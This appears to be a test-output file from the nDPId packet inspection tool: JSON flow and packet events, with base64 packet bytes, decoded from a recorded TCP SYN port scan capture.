-00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"synscan.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAs72YAADQGJQysEAAIQA2GNIzSAG\/dUoMYAAAAAGACBAA0IAAAAgQFtA=="} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"synscan.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"synscan.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAsQzMAACsG2j+sEAAIQA2GNIzSBAHdUoMYAAAAAGACEAAkjgAAAgQFtA=="} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"synscan.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"synscan.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAsMnwAACwG6fasEAAIQA2GNIzSA+PdUoMYAAAAAGACBAAwrAAAAgQFtA=="} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"synscan.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":587,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"synscan.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAs3nEAADAGOgGsEAAIQA2GNIzSAkvdUoMYAAAAAGACBAAyRAAAAgQFtA=="} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"synscan.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"synscan.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAspjUAADYGbD2sEAAIQA2GNIzSADXdUoMYAAAAAGACDAAsWgAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"synscan.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"synscan.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAsxrsAADgGSbesEAAIQA2GNIzSFwzdUoMYAAAAAGACBAAdgwAAAgQFtA=="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"synscan.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1278275056338,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1278275056338,"pkt":"ACWzv5HuACYLMQczCABFAAAsAABAADYG0nJADYY0rBAACAA1jNJCmj\/E3VKDGWASFtCfagAAAgQFZAAA"} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"synscan.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056340,"flow_last_seen":1278275056340,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056340,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"synscan.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1278275056340,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056340,"pkt":"ACYLMQczACWzv5HuCABFAAAsv+0AADcGUYWsEAAIQA2GNIzSABXdUoMYAAAAAGACEAAoegAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"synscan.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056340,"flow_last_seen":1278275056340,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056340,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"synscan.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1278275056340,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056340,"pkt":"ACYLMQczACWzv5HuCABFAAAsQrAAADsGysKsEAAIQA2GNIzSAHHdUoMYAAAAAGACEAAoHgAAAgQFtA=="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"synscan.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1278275056401,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1278275056401,"pkt":"ACWzv5HuACYLMQczCABFAAAoAABAADYG0nZADYY0rBAACABxjNKSwt+J3VKDGVAUAADdegAAAAAAAAAA"} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"synscan.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056403,"flow_last_seen":1278275056403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056403,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"synscan.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1278275056403,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056403,"pkt":"ACYLMQczACWzv5HuCABFAAAstfQAACYGbH6sEAAIQA2GNIzSAFDdUoMYAAAAAGACDAAsPwAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"synscan.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056403,"flow_last_seen":1278275056403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056403,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"synscan.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1278275056403,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056403,"pkt":"ACYLMQczACWzv5HuCABFAAAsT54AADAGyNSsEAAIQA2GNIzSAIvdUoMYAAAAAGACBAA0BAAAAgQFtA=="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"synscan.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1278275056464,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1278275056464,"pkt":"ACWzv5HuACYLMQczCABFAAAsAABAADYG0nJADYY0rBAACABQjNJ7XAKI3VKDGWASFtCjyQAAAgQFZAAA"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"synscan.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056466,"flow_last_seen":1278275056466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056466,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"synscan.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1278275056466,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056466,"pkt":"ACYLMQczACWzv5HuCABFAAAsoqsAAC4Gd8esEAAIQA2GNIzSDT3dUoMYAAAAAGACDAAfUgAAAgQFtA=="} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"synscan.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056466,"flow_last_seen":1278275056466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056466,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":23,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"synscan.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1278275056466,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056466,"pkt":"ACYLMQczACWzv5HuCABFAAAs400AADkGLCWsEAAIQA2GNIzSABfdUoMYAAAAAGACCAAweAAAAgQFtA=="} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"synscan.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057477,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":23,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"synscan.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057477,"pkt":"ACYLMQczACWzv5HuCABFAAAs0LAAACUGUsKsEAAIQA2GNIzTABfdU4MZAAAAAGACCAAwdQAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"synscan.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057477,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"synscan.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057477,"pkt":"ACYLMQczACWzv5HuCABFAAAsjfEAACkGkYGsEAAIQA2GNIzTDT3dU4MZAAAAAGACCAAjTwAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"synscan.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057477,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"synscan.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057477,"pkt":"ACYLMQczACWzv5HuCABFAAAs40UAADcGLi2sEAAIQA2GNIzTAIvdU4MZAAAAAGACEAAoAQAAAgQFtA=="} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"synscan.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057477,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"synscan.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057477,"pkt":"ACYLMQczACWzv5HuCABFAAAsNE8AACgG7COsEAAIQA2GNIzTABXdU4MZAAAAAGACBAA0dwAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"synscan.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"synscan.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAskg4AAC4GiGSsEAAIQA2GNIzTFwzdU4MZAAAAAGACDAAVgAAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"synscan.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":587,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"synscan.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAsh\/MAAC8GkX+sEAAIQA2GNIzTAkvdU4MZAAAAAGACEAAmQQAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"synscan.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"synscan.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAscq0AACUGsMWsEAAIQA2GNIzTA+PdU4MZAAAAAGACCAAsqQAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"synscan.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"synscan.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAsocYAACoGfKysEAAIQA2GNIzTBAHdU4MZAAAAAGACDAAoiwAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"synscan.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"synscan.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAs0nYAADMGQvysEAAIQA2GNIzTAG\/dU4MZAAAAAGACEAAoHQAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"synscan.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"synscan.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAs0EcAADoGPiusEAAIQA2GNIzTAMfdU4MZAAAAAGACDAArxQAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"synscan.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"synscan.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAs+2cAACwGIQusEAAIQA2GNIzTDOrdU4MZAAAAAGACBAAnogAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"synscan.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"synscan.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAsTRAAAC8GzGKsEAAIQA2GNIzTAI\/dU4MZAAAAAGACEAAn\/QAAAgQFtA=="} 